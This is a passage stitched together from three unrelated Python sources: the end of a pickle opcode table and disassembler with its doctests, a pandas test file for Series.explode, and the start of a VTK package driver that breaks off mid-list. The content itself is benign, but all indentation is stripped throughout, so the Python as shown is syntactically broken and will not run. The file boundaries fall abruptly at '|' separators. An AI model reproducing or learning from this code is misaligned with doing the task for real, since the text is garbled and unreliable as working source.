Stack after: ... frozenset({1, 2, 3})
"""),
# Stack manipulation.
I(name='POP',
code='0',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="Discard the top stack item, shrinking the stack by one item."),
I(name='DUP',
code='2',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject, anyobject],
proto=0,
doc="Push the top stack item onto the stack again, duplicating it."),
I(name='MARK',
code='(',
arg=None,
stack_before=[],
stack_after=[markobject],
proto=0,
doc="""Push markobject onto the stack.
markobject is a unique object, used by other opcodes to identify a
region of the stack containing a variable number of objects for them
to work on. See markobject.doc for more detail.
"""),
I(name='POP_MARK',
code='1',
arg=None,
stack_before=[markobject, stackslice],
stack_after=[],
proto=1,
doc="""Pop all the stack objects at and above the topmost markobject.
When an opcode using a variable number of stack objects is done,
POP_MARK is used to remove those objects, and to remove the markobject
that delimited their starting position on the stack.
"""),
# Memo manipulation. There are really only two operations (get and put),
# each in all-text, "short binary", and "long binary" flavors.
I(name='GET',
code='g',
arg=decimalnl_short,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the newline-terminated
decimal string following. BINGET and LONG_BINGET are space-optimized
versions.
"""),
I(name='BINGET',
code='h',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 1-byte unsigned
integer following.
"""),
I(name='LONG_BINGET',
code='j',
arg=uint4,
stack_before=[],
stack_after=[anyobject],
proto=1,
doc="""Read an object from the memo and push it on the stack.
The index of the memo object to push is given by the 4-byte unsigned
little-endian integer following.
"""),
I(name='PUT',
code='p',
arg=decimalnl_short,
stack_before=[],
stack_after=[],
proto=0,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the newline-
terminated decimal string following. BINPUT and LONG_BINPUT are
space-optimized versions.
"""),
I(name='BINPUT',
code='q',
arg=uint1,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 1-byte
unsigned integer following.
"""),
I(name='LONG_BINPUT',
code='r',
arg=uint4,
stack_before=[],
stack_after=[],
proto=1,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write into is given by the 4-byte
unsigned little-endian integer following.
"""),
I(name='MEMOIZE',
code='\x94',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=4,
doc="""Store the stack top into the memo. The stack is not popped.
The index of the memo location to write is the number of
elements currently present in the memo.
"""),
# Access the extension registry (predefined objects). Akin to the GET
# family.
I(name='EXT1',
code='\x82',
arg=uint1,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
This code and the similar EXT2 and EXT4 allow using a registry
of popular objects that are pickled by name, typically classes.
It is envisioned that through a global negotiation and
registration process, third parties can set up a mapping between
ints and object names.
In order to guarantee pickle interchangeability, the extension
code registry ought to be global, although a range of codes may
be reserved for private use.
EXT1 has a 1-byte integer argument. This is used to index into the
extension registry, and the object at that index is pushed on the stack.
"""),
I(name='EXT2',
code='\x83',
arg=uint2,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT2 has a two-byte integer argument.
"""),
I(name='EXT4',
code='\x84',
arg=int4,
stack_before=[],
stack_after=[anyobject],
proto=2,
doc="""Extension code.
See EXT1. EXT4 has a four-byte integer argument.
"""),
# Push a class object, or module function, on the stack, via its module
# and name.
I(name='GLOBAL',
code='c',
arg=stringnl_noescape_pair,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push a global object (module.attr) on the stack.
Two newline-terminated strings follow the GLOBAL opcode. The first is
taken as a module name, and the second as a class name. The class
object module.class is pushed on the stack. More accurately, the
object returned by self.find_class(module, class) is pushed on the
stack, so unpickling subclasses can override this form of lookup.
"""),
I(name='STACK_GLOBAL',
code='\x93',
arg=None,
stack_before=[pyunicode, pyunicode],
stack_after=[anyobject],
proto=4,
doc="""Push a global object (module.attr) on the stack.
"""),
# Ways to build objects of classes pickle doesn't know about directly
# (user-defined classes). I despair of documenting this accurately
# and comprehensibly -- you really have to read the pickle code to
# find all the special cases.
I(name='REDUCE',
code='R',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Push an object built from a callable and an argument tuple.
The opcode is named to remind of the __reduce__() method.
Stack before: ... callable pytuple
Stack after: ... callable(*pytuple)
The callable and the argument tuple are the first two items returned
by a __reduce__ method. Applying the callable to the argtuple is
supposed to reproduce the original object, or at least get it started.
If the __reduce__ method returns a 3-tuple, the last component is an
argument to be passed to the object's __setstate__, and then the REDUCE
opcode is followed by code to create setstate's argument, and then a
BUILD opcode to apply __setstate__ to that argument.
If not isinstance(callable, type), REDUCE complains unless the
callable has been registered with the copyreg module's
safe_constructors dict, or the callable has a magic
'__safe_for_unpickling__' attribute with a true value. I'm not sure
why it does this, but I've sure seen this complaint often enough when
I didn't want to <wink>.
"""),
I(name='BUILD',
code='b',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=0,
doc="""Finish building an object, via __setstate__ or dict update.
Stack before: ... anyobject argument
Stack after: ... anyobject
where anyobject may have been mutated, as follows:
If the object has a __setstate__ method,
anyobject.__setstate__(argument)
is called.
Else the argument must be a dict, the object must have a __dict__, and
the object is updated via
anyobject.__dict__.update(argument)
"""),
I(name='INST',
code='i',
arg=stringnl_noescape_pair,
stack_before=[markobject, stackslice],
stack_after=[anyobject],
proto=0,
doc="""Build a class instance.
This is the protocol 0 version of protocol 1's OBJ opcode.
INST is followed by two newline-terminated strings, giving a
module and class name, just as for the GLOBAL opcode (and see
GLOBAL for more details about that). self.find_class(module, name)
is used to get a class object.
In addition, all the objects on the stack following the topmost
markobject are gathered into a tuple and popped (along with the
topmost markobject), just as for the TUPLE opcode.
Now it gets complicated. If all of these are true:
+ The argtuple is empty (markobject was at the top of the stack
at the start).
+ The class object does not have a __getinitargs__ attribute.
then we want to create an old-style class instance without invoking
its __init__() method (pickle has waffled on this over the years; not
calling __init__() is current wisdom). In this case, an instance of
an old-style dummy class is created, and then we try to rebind its
__class__ attribute to the desired class object. If this succeeds,
the new instance object is pushed on the stack, and we're done.
Else (the argtuple is not empty, it's not an old-style class object,
or the class object does have a __getinitargs__ attribute), the code
first insists that the class object have a __safe_for_unpickling__
attribute. Unlike as for the __safe_for_unpickling__ check in REDUCE,
it doesn't matter whether this attribute has a true or false value, it
only matters whether it exists (XXX this is a bug). If
__safe_for_unpickling__ doesn't exist, UnpicklingError is raised.
Else (the class object does have a __safe_for_unpickling__ attr),
the class object obtained from INST's arguments is applied to the
argtuple obtained from the stack, and the resulting instance object
is pushed on the stack.
NOTE: checks for __safe_for_unpickling__ went away in Python 2.3.
NOTE: the distinction between old-style and new-style classes does
not make sense in Python 3.
"""),
I(name='OBJ',
code='o',
arg=None,
stack_before=[markobject, anyobject, stackslice],
stack_after=[anyobject],
proto=1,
doc="""Build a class instance.
This is the protocol 1 version of protocol 0's INST opcode, and is
very much like it. The major difference is that the class object
is taken off the stack, allowing it to be retrieved from the memo
repeatedly if several instances of the same class are created. This
can be much more efficient (in both time and space) than repeatedly
embedding the module and class names in INST opcodes.
Unlike INST, OBJ takes no arguments from the opcode stream. Instead
the class object is taken off the stack, immediately above the
topmost markobject:
Stack before: ... markobject classobject stackslice
Stack after: ... new_instance_object
As for INST, the remainder of the stack above the markobject is
gathered into an argument tuple, and then the logic seems identical,
except that no __safe_for_unpickling__ check is done (XXX this is
a bug). See INST for the gory details.
NOTE: In Python 2.3, INST and OBJ are identical except for how they
get the class object. That was always the intent; the implementations
had diverged for accidental reasons.
"""),
I(name='NEWOBJ',
code='\x81',
arg=None,
stack_before=[anyobject, anyobject],
stack_after=[anyobject],
proto=2,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple (the tuple being the stack
top). Call these cls and args. They are popped off the stack,
and the value returned by cls.__new__(cls, *args) is pushed back
onto the stack.
"""),
I(name='NEWOBJ_EX',
code='\x92',
arg=None,
stack_before=[anyobject, anyobject, anyobject],
stack_after=[anyobject],
proto=4,
doc="""Build an object instance.
The stack before should be thought of as containing a class
object followed by an argument tuple and by a keyword argument dict
(the dict being the stack top). Call these cls and args. They are
popped off the stack, and the value returned by
cls.__new__(cls, *args, *kwargs) is pushed back onto the stack.
"""),
# Machine control.
I(name='PROTO',
code='\x80',
arg=uint1,
stack_before=[],
stack_after=[],
proto=2,
doc="""Protocol version indicator.
For protocol 2 and above, a pickle must start with this opcode.
The argument is the protocol version, an int in range(2, 256).
"""),
I(name='STOP',
code='.',
arg=None,
stack_before=[anyobject],
stack_after=[],
proto=0,
doc="""Stop the unpickling machine.
Every pickle ends with this opcode. The object at the top of the stack
is popped, and that's the result of unpickling. The stack should be
empty then.
"""),
# Framing support.
I(name='FRAME',
code='\x95',
arg=uint8,
stack_before=[],
stack_after=[],
proto=4,
doc="""Indicate the beginning of a new frame.
The unpickler may use this opcode to safely prefetch data from its
underlying stream.
"""),
# Ways to deal with persistent IDs.
I(name='PERSID',
code='P',
arg=stringnl_noescape,
stack_before=[],
stack_after=[anyobject],
proto=0,
doc="""Push an object identified by a persistent ID.
The pickle module doesn't define what a persistent ID means. PERSID's
argument is a newline-terminated str-style (no embedded escapes, no
bracketing quote characters) string, which *is* "the persistent ID".
The unpickler passes this string to self.persistent_load(). Whatever
object that returns is pushed on the stack. There is no implementation
of persistent_load() in Python's unpickler: it must be supplied by an
unpickler subclass.
"""),
I(name='BINPERSID',
code='Q',
arg=None,
stack_before=[anyobject],
stack_after=[anyobject],
proto=1,
doc="""Push an object identified by a persistent ID.
Like PERSID, except the persistent ID is popped off the stack (instead
of being a string embedded in the opcode bytestream). The persistent
ID is passed to self.persistent_load(), and whatever object that
returns is pushed on the stack. See PERSID for more detail.
"""),
]
del I
name2i = {}
code2i = {}
for i, d in enumerate(opcodes):
if d.name in name2i:
raise ValueError("repeated name %r at indices %d and %d" %
(d.name, name2i[d.name], i))
if d.code in code2i:
raise ValueError("repeated code %r at indices %d and %d" %
(d.code, code2i[d.code], i))
name2i[d.name] = i
code2i[d.code] = i
del name2i, code2i, i, d
code2op = {}
for d in opcodes:
code2op[d.code] = d
del d
def assure_pickle_consistency(verbose=False):
copy = code2op.copy()
for name in pickle.__all__:
if not re.match("[A-Z][A-Z0-9_]+$", name):
if verbose:
print("skipping %r: it doesn't look like an opcode name" % name)
continue
picklecode = getattr(pickle, name)
if not isinstance(picklecode, bytes) or len(picklecode) != 1:
if verbose:
print(("skipping %r: value %r doesn't look like a pickle "
"code" % (name, picklecode)))
continue
picklecode = picklecode.decode("latin-1")
if picklecode in copy:
if verbose:
print("checking name %r w/ code %r for consistency" % (
name, picklecode))
d = copy[picklecode]
if d.name != name:
raise ValueError("for pickle code %r, pickle.py uses name %r "
"but we're using name %r" % (picklecode,
name,
d.name))
# Forget this one. Any left over in copy at the end are a problem
# of a different kind.
del copy[picklecode]
else:
raise ValueError("pickle.py appears to have a pickle opcode with "
"name %r and code %r, but we don't" %
(name, picklecode))
if copy:
msg = ["we appear to have pickle opcodes that pickle.py doesn't have:"]
for code, d in copy.items():
msg.append(" name %r with code %r" % (d.name, code))
raise ValueError("\n".join(msg))
assure_pickle_consistency()
del assure_pickle_consistency
def _genops(data, yield_end_pos=False):
if isinstance(data, bytes_types):
data = io.BytesIO(data)
if hasattr(data, "tell"):
getpos = data.tell
else:
getpos = lambda: None
while True:
pos = getpos()
code = data.read(1)
opcode = code2op.get(code.decode("latin-1"))
if opcode is None:
if code == b"":
raise ValueError("pickle exhausted before seeing STOP")
else:
raise ValueError("at position %s, opcode %r unknown" % (
"<unknown>" if pos is None else pos,
code))
if opcode.arg is None:
arg = None
else:
arg = opcode.arg.reader(data)
if yield_end_pos:
yield opcode, arg, pos, getpos()
else:
yield opcode, arg, pos
if code == b'.':
assert opcode.name == 'STOP'
break
def genops(pickle):
"""Generate all the opcodes in a pickle.
'pickle' is a file-like object, or string, containing the pickle.
Each opcode in the pickle is generated, from the current pickle position,
stopping after a STOP opcode is delivered. A triple is generated for
each opcode:
opcode, arg, pos
opcode is an OpcodeInfo record, describing the current opcode.
If the opcode has an argument embedded in the pickle, arg is its decoded
value, as a Python object. If the opcode doesn't have an argument, arg
is None.
If the pickle has a tell() method, pos was the value of pickle.tell()
before reading the current opcode. If the pickle is a bytes object,
it's wrapped in a BytesIO object, and the latter's tell() result is
used. Else (the pickle doesn't have a tell(), and it's not obvious how
to query its current position) pos is None.
"""
return _genops(pickle)
def optimize(p):
'Optimize a pickle string by removing unused PUT opcodes'
put = 'PUT'
get = 'GET'
oldids = set() # set of all PUT ids
newids = {} # set of ids used by a GET opcode
opcodes = [] # (op, idx) or (pos, end_pos)
proto = 0
protoheader = b''
for opcode, arg, pos, end_pos in _genops(p, yield_end_pos=True):
if 'PUT' in opcode.name:
oldids.add(arg)
opcodes.append((put, arg))
elif opcode.name == 'MEMOIZE':
idx = len(oldids)
oldids.add(idx)
opcodes.append((put, idx))
elif 'FRAME' in opcode.name:
pass
elif 'GET' in opcode.name:
if opcode.proto > proto:
proto = opcode.proto
newids[arg] = None
opcodes.append((get, arg))
elif opcode.name == 'PROTO':
if arg > proto:
proto = arg
if pos == 0:
protoheader = p[pos: end_pos]
else:
opcodes.append((pos, end_pos))
else:
opcodes.append((pos, end_pos))
del oldids
# Copy the opcodes except for PUTS without a corresponding GET
out = io.BytesIO()
# Write the PROTO header before any framing
out.write(protoheader)
pickler = pickle._Pickler(out, proto)
if proto >= 4:
pickler.framer.start_framing()
idx = 0
for op, arg in opcodes:
if op is put:
if arg not in newids:
continue
data = pickler.put(idx)
newids[arg] = idx
idx += 1
elif op is get:
data = pickler.get(newids[arg])
else:
data = p[op:arg]
pickler.framer.commit_frame()
pickler.write(data)
pickler.framer.end_framing()
return out.getvalue()
def dis(pickle, out=None, memo=None, indentlevel=4, annotate=0):
"""Produce a symbolic disassembly of a pickle.
'pickle' is a file-like object, or string, containing a (at least one)
pickle. The pickle is disassembled from the current position, through
the first STOP opcode encountered.
Optional arg 'out' is a file-like object to which the disassembly is
printed. It defaults to sys.stdout.
Optional arg 'memo' is a Python dict, used as the pickle's memo. It
may be mutated by dis(), if the pickle contains PUT or BINPUT opcodes.
Passing the same memo object to another dis() call then allows disassembly
to proceed across multiple pickles that were all created by the same
pickler with the same memo. Ordinarily you don't need to worry about this.
Optional arg 'indentlevel' is the number of blanks by which to indent
a new MARK level. It defaults to 4.
Optional arg 'annotate' if nonzero instructs dis() to add short
description of the opcode on each line of disassembled output.
The value given to 'annotate' must be an integer and is used as a
hint for the column where annotation should start. The default
value is 0, meaning no annotations.
In addition to printing the disassembly, some sanity checks are made:
+ All embedded opcode arguments "make sense".
+ Explicit and implicit pop operations have enough items on the stack.
+ When an opcode implicitly refers to a markobject, a markobject is
actually on the stack.
+ A memo entry isn't referenced before it's defined.
+ The markobject isn't stored in the memo.
+ A memo entry isn't redefined.
"""
# Most of the hair here is for sanity checks, but most of it is needed
# anyway to detect when a protocol 0 POP takes a MARK off the stack
# (which in turn is needed to indent MARK blocks correctly).
stack = [] # crude emulation of unpickler stack
if memo is None:
memo = {} # crude emulation of unpickler memo
maxproto = -1 # max protocol number seen
markstack = [] # bytecode positions of MARK opcodes
indentchunk = ' ' * indentlevel
errormsg = None
annocol = annotate # column hint for annotations
for opcode, arg, pos in genops(pickle):
if pos is not None:
print("%5d:" % pos, end=' ', file=out)
line = "%-4s %s%s" % (repr(opcode.code)[1:-1],
indentchunk * len(markstack),
opcode.name)
maxproto = max(maxproto, opcode.proto)
before = opcode.stack_before # don't mutate
after = opcode.stack_after # don't mutate
numtopop = len(before)
# See whether a MARK should be popped.
markmsg = None
if markobject in before or (opcode.name == "POP" and
stack and
stack[-1] is markobject):
assert markobject not in after
if __debug__:
if markobject in before:
assert before[-1] is stackslice
if markstack:
markpos = markstack.pop()
if markpos is None:
markmsg = "(MARK at unknown opcode offset)"
else:
markmsg = "(MARK at %d)" % markpos
# Pop everything at and after the topmost markobject.
while stack[-1] is not markobject:
stack.pop()
stack.pop()
# Stop later code from popping too much.
try:
numtopop = before.index(markobject)
except ValueError:
assert opcode.name == "POP"
numtopop = 0
else:
errormsg = markmsg = "no MARK exists on stack"
# Check for correct memo usage.
if opcode.name in ("PUT", "BINPUT", "LONG_BINPUT", "MEMOIZE"):
if opcode.name == "MEMOIZE":
memo_idx = len(memo)
markmsg = "(as %d)" % memo_idx
else:
assert arg is not None
memo_idx = arg
if memo_idx in memo:
errormsg = "memo key %r already defined" % arg
elif not stack:
errormsg = "stack is empty -- can't store into memo"
elif stack[-1] is markobject:
errormsg = "can't store markobject in the memo"
else:
memo[memo_idx] = stack[-1]
elif opcode.name in ("GET", "BINGET", "LONG_BINGET"):
if arg in memo:
assert len(after) == 1
after = [memo[arg]] # for better stack emulation
else:
errormsg = "memo key %r has never been stored into" % arg
if arg is not None or markmsg:
# make a mild effort to align arguments
line += ' ' * (10 - len(opcode.name))
if arg is not None:
line += ' ' + repr(arg)
if markmsg:
line += ' ' + markmsg
if annotate:
line += ' ' * (annocol - len(line))
# make a mild effort to align annotations
annocol = len(line)
if annocol > 50:
annocol = annotate
line += ' ' + opcode.doc.split('\n', 1)[0]
print(line, file=out)
if errormsg:
# Note that we delayed complaining until the offending opcode
# was printed.
raise ValueError(errormsg)
# Emulate the stack effects.
if len(stack) < numtopop:
raise ValueError("tries to pop %d items from stack with "
"only %d items" % (numtopop, len(stack)))
if numtopop:
del stack[-numtopop:]
if markobject in after:
assert markobject not in before
markstack.append(pos)
stack.extend(after)
print("highest protocol among opcodes =", maxproto, file=out)
if stack:
raise ValueError("stack not empty after STOP: %r" % stack)
class _Example:
def __init__(self, value):
self.value = value
_dis_test = r"""
>>> import pickle
>>> x = [1, 2, (3, 4), {b'abc': "def"}]
>>> pkl0 = pickle.dumps(x, 0)
>>> dis(pkl0)
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: L LONG 1
9: a APPEND
10: L LONG 2
14: a APPEND
15: ( MARK
16: L LONG 3
20: L LONG 4
24: t TUPLE (MARK at 15)
25: p PUT 1
28: a APPEND
29: ( MARK
30: d DICT (MARK at 29)
31: p PUT 2
34: c GLOBAL '_codecs encode'
50: p PUT 3
53: ( MARK
54: V UNICODE 'abc'
59: p PUT 4
62: V UNICODE 'latin1'
70: p PUT 5
73: t TUPLE (MARK at 53)
74: p PUT 6
77: R REDUCE
78: p PUT 7
81: V UNICODE 'def'
86: p PUT 8
89: s SETITEM
90: a APPEND
91: . STOP
highest protocol among opcodes = 0
Try again with a "binary" pickle.
>>> pkl1 = pickle.dumps(x, 1)
>>> dis(pkl1)
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: K BININT1 1
6: K BININT1 2
8: ( MARK
9: K BININT1 3
11: K BININT1 4
13: t TUPLE (MARK at 8)
14: q BINPUT 1
16: } EMPTY_DICT
17: q BINPUT 2
19: c GLOBAL '_codecs encode'
35: q BINPUT 3
37: ( MARK
38: X BINUNICODE 'abc'
46: q BINPUT 4
48: X BINUNICODE 'latin1'
59: q BINPUT 5
61: t TUPLE (MARK at 37)
62: q BINPUT 6
64: R REDUCE
65: q BINPUT 7
67: X BINUNICODE 'def'
75: q BINPUT 8
77: s SETITEM
78: e APPENDS (MARK at 3)
79: . STOP
highest protocol among opcodes = 1
Exercise the INST/OBJ/BUILD family.
>>> import pickletools
>>> dis(pickle.dumps(pickletools.dis, 0))
0: c GLOBAL 'pickletools dis'
17: p PUT 0
20: . STOP
highest protocol among opcodes = 0
>>> from pickletools import _Example
>>> x = [_Example(42)] * 2
>>> dis(pickle.dumps(x, 0))
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: c GLOBAL 'copy_reg _reconstructor'
30: p PUT 1
33: ( MARK
34: c GLOBAL 'pickletools _Example'
56: p PUT 2
59: c GLOBAL '__builtin__ object'
79: p PUT 3
82: N NONE
83: t TUPLE (MARK at 33)
84: p PUT 4
87: R REDUCE
88: p PUT 5
91: ( MARK
92: d DICT (MARK at 91)
93: p PUT 6
96: V UNICODE 'value'
103: p PUT 7
106: L LONG 42
111: s SETITEM
112: b BUILD
113: a APPEND
114: g GET 5
117: a APPEND
118: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(x, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: c GLOBAL 'copy_reg _reconstructor'
29: q BINPUT 1
31: ( MARK
32: c GLOBAL 'pickletools _Example'
54: q BINPUT 2
56: c GLOBAL '__builtin__ object'
76: q BINPUT 3
78: N NONE
79: t TUPLE (MARK at 31)
80: q BINPUT 4
82: R REDUCE
83: q BINPUT 5
85: } EMPTY_DICT
86: q BINPUT 6
88: X BINUNICODE 'value'
98: q BINPUT 7
100: K BININT1 42
102: s SETITEM
103: b BUILD
104: h BINGET 5
106: e APPENDS (MARK at 3)
107: . STOP
highest protocol among opcodes = 1
Try "the canonical" recursive-object test.
>>> L = []
>>> T = L,
>>> L.append(T)
>>> L[0] is T
True
>>> T[0] is L
True
>>> L[0][0] is L
True
>>> T[0][0] is T
True
>>> dis(pickle.dumps(L, 0))
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: ( MARK
6: g GET 0
9: t TUPLE (MARK at 5)
10: p PUT 1
13: a APPEND
14: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(L, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: h BINGET 0
6: t TUPLE (MARK at 3)
7: q BINPUT 1
9: a APPEND
10: . STOP
highest protocol among opcodes = 1
Note that, in the protocol 0 pickle of the recursive tuple, the disassembler
has to emulate the stack in order to realize that the POP opcode at 16 gets
rid of the MARK at 0.
>>> dis(pickle.dumps(T, 0))
0: ( MARK
1: ( MARK
2: l LIST (MARK at 1)
3: p PUT 0
6: ( MARK
7: g GET 0
10: t TUPLE (MARK at 6)
11: p PUT 1
14: a APPEND
15: 0 POP
16: 0 POP (MARK at 0)
17: g GET 1
20: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(T, 1))
0: ( MARK
1: ] EMPTY_LIST
2: q BINPUT 0
4: ( MARK
5: h BINGET 0
7: t TUPLE (MARK at 4)
8: q BINPUT 1
10: a APPEND
11: 1 POP_MARK (MARK at 0)
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 1
Try protocol 2.
>>> dis(pickle.dumps(L, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: . STOP
highest protocol among opcodes = 2
>>> dis(pickle.dumps(T, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: 0 POP
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 2
Try protocol 3 with annotations:
>>> dis(pickle.dumps(T, 3), annotate=1)
0: \x80 PROTO 3 Protocol version indicator.
2: ] EMPTY_LIST Push an empty list.
3: q BINPUT 0 Store the stack top into the memo. The stack is not popped.
5: h BINGET 0 Read an object from the memo and push it on the stack.
7: \x85 TUPLE1 Build a one-tuple out of the topmost item on the stack.
8: q BINPUT 1 Store the stack top into the memo. The stack is not popped.
10: a APPEND Append an object to a list.
11: 0 POP Discard the top stack item, shrinking the stack by one item.
12: h BINGET 1 Read an object from the memo and push it on the stack.
14: . STOP Stop the unpickling machine.
highest protocol among opcodes = 2
"""
_memo_test = r"""
>>> import pickle
>>> import io
>>> f = io.BytesIO()
>>> p = pickle.Pickler(f, 2)
>>> x = [1, 2, 3]
>>> p.dump(x)
>>> p.dump(x)
>>> f.seek(0)
0
>>> memo = {}
>>> dis(f, memo=memo)
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 1
8: K BININT1 2
10: K BININT1 3
12: e APPENDS (MARK at 5)
13: . STOP
highest protocol among opcodes = 2
>>> dis(f, memo=memo)
14: \x80 PROTO 2
16: h BINGET 0
18: . STOP
highest protocol among opcodes = 2
"""
__test__ = {'disassembler_test': _dis_test,
'disassembler_memo_test': _memo_test,
}
def _test():
import doctest
return doctest.testmod()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='disassemble one or more pickle files')
parser.add_argument(
'pickle_file', type=argparse.FileType('br'),
nargs='*', help='the pickle file')
parser.add_argument(
'-o', '--output', default=sys.stdout, type=argparse.FileType('w'),
help='the file where the output should be written')
parser.add_argument(
'-m', '--memo', action='store_true',
help='preserve memo between disassemblies')
parser.add_argument(
'-l', '--indentlevel', default=4, type=int,
help='the number of blanks by which to indent a new MARK level')
parser.add_argument(
'-a', '--annotate', action='store_true',
help='annotate each line with a short opcode description')
parser.add_argument(
'-p', '--preamble', default="==> {name} <==",
help='if more than one pickle file is specified, print this before'
' each disassembly')
parser.add_argument(
'-t', '--test', action='store_true',
help='run self-test suite')
parser.add_argument(
'-v', action='store_true',
help='run verbosely; only affects self-test run')
args = parser.parse_args()
if args.test:
_test()
else:
annotate = 30 if args.annotate else 0
if not args.pickle_file:
parser.print_help()
elif len(args.pickle_file) == 1:
dis(args.pickle_file[0], args.output, None,
args.indentlevel, annotate)
else:
memo = {} if args.memo else None
for f in args.pickle_file:
preamble = args.preamble.format(name=f.name)
args.output.write(preamble + '\n')
dis(f, args.output, memo, args.indentlevel, annotate)
|
import numpy as np
import pytest
import pandas as pd
import pandas._testing as tm
def test_basic():
s = pd.Series([[0, 1, 2], np.nan, [], (3, 4)], index=list("abcd"), name="foo")
result = s.explode()
expected = pd.Series(
[0, 1, 2, np.nan, np.nan, 3, 4], index=list("aaabcdd"), dtype=object, name="foo"
)
tm.assert_series_equal(result, expected)
def test_mixed_type():
s = pd.Series(
[[0, 1, 2], np.nan, None, np.array([]), pd.Series(["a", "b"])], name="foo"
)
result = s.explode()
expected = pd.Series(
[0, 1, 2, np.nan, None, np.nan, "a", "b"],
index=[0, 0, 0, 1, 2, 3, 4, 4],
dtype=object,
name="foo",
)
tm.assert_series_equal(result, expected)
def test_empty():
s = pd.Series(dtype=object)
result = s.explode()
expected = s.copy()
tm.assert_series_equal(result, expected)
def test_nested_lists():
s = pd.Series([[[1, 2, 3]], [1, 2], 1])
result = s.explode()
expected = pd.Series([[1, 2, 3], 1, 2, 1], index=[0, 1, 1, 2])
tm.assert_series_equal(result, expected)
def test_multi_index():
s = pd.Series(
[[0, 1, 2], np.nan, [], (3, 4)],
name="foo",
index=pd.MultiIndex.from_product([list("ab"), range(2)], names=["foo", "bar"]),
)
result = s.explode()
index = pd.MultiIndex.from_tuples(
[("a", 0), ("a", 0), ("a", 0), ("a", 1), ("b", 0), ("b", 1), ("b", 1)],
names=["foo", "bar"],
)
expected = pd.Series(
[0, 1, 2, np.nan, np.nan, 3, 4], index=index, dtype=object, name="foo"
)
tm.assert_series_equal(result, expected)
def test_large():
s = pd.Series([range(256)]).explode()
result = s.explode()
tm.assert_series_equal(result, s)
def test_invert_array():
df = pd.DataFrame({"a": pd.date_range("20190101", periods=3, tz="UTC")})
listify = df.apply(lambda x: x.array, axis=1)
result = listify.explode()
tm.assert_series_equal(result, df["a"].rename())
@pytest.mark.parametrize(
"s", [pd.Series([1, 2, 3]), pd.Series(pd.date_range("2019", periods=3, tz="UTC"))]
)
def non_object_dtype(s):
result = s.explode()
tm.assert_series_equal(result, s)
def test_typical_usecase():
df = pd.DataFrame(
[{"var1": "a,b,c", "var2": 1}, {"var1": "d,e,f", "var2": 2}],
columns=["var1", "var2"],
)
exploded = df.var1.str.split(",").explode()
result = df[["var2"]].join(exploded)
expected = pd.DataFrame(
{"var2": [1, 1, 1, 2, 2, 2], "var1": list("abcdef")},
columns=["var2", "var1"],
index=[0, 0, 0, 1, 1, 1],
)
tm.assert_frame_equal(result, expected)
def test_nested_EA():
# a nested EA array
s = pd.Series(
[
pd.date_range("20170101", periods=3, tz="UTC"),
pd.date_range("20170104", periods=3, tz="UTC"),
]
)
result = s.explode()
expected = pd.Series(
pd.date_range("20170101", periods=6, tz="UTC"), index=[0, 0, 0, 1, 1, 1]
)
tm.assert_series_equal(result, expected)
def test_duplicate_index():
# GH 28005
s = pd.Series([[1, 2], [3, 4]], index=[0, 0])
result = s.explode()
expected = pd.Series([1, 2, 3, 4], index=[0, 0, 0, 0], dtype=object)
tm.assert_series_equal(result, expected)
def test_ignore_index():
# GH 34932
s = pd.Series([[1, 2], [3, 4]])
result = s.explode(ignore_index=True)
expected = pd.Series([1, 2, 3, 4], index=[0, 1, 2, 3], dtype=object)
tm.assert_series_equal(result, expected)
def test_explode_sets():
# https://github.com/pandas-dev/pandas/issues/35614
s = pd.Series([{"a", "b", "c"}], index=[1])
result = s.explode().sort_values()
expected = pd.Series(["a", "b", "c"], index=[1, 1, 1])
tm.assert_series_equal(result, expected)
def test_explode_scalars_can_ignore_index():
# https://github.com/pandas-dev/pandas/issues/40487
s = pd.Series([1, 2, 3], index=["a", "b", "c"])
result = s.explode(ignore_index=True)
expected = pd.Series([1, 2, 3])
tm.assert_series_equal(result, expected)
|
"""vtk_kit package driver file.
This performs all initialisation necessary to use VTK from DeVIDE. Makes
sure that all VTK classes have ErrorEvent handlers that report back to
the ModuleManager.
Inserts the following modules in sys.modules: vtk, vtkdevide.
@author: Charl P. Botha <http://cpbotha.net/>
"""
import re
import sys
import traceback
import types
VERSION = ''
def preImportVTK(progressMethod):
vtkImportList = [('vtk.common', 'VTK Common.'),
('vtk.filtering', 'VTK Filtering.'),
('vtk.io', 'VTK IO.'),
('vtk.imaging', 'VTK Imaging.'),
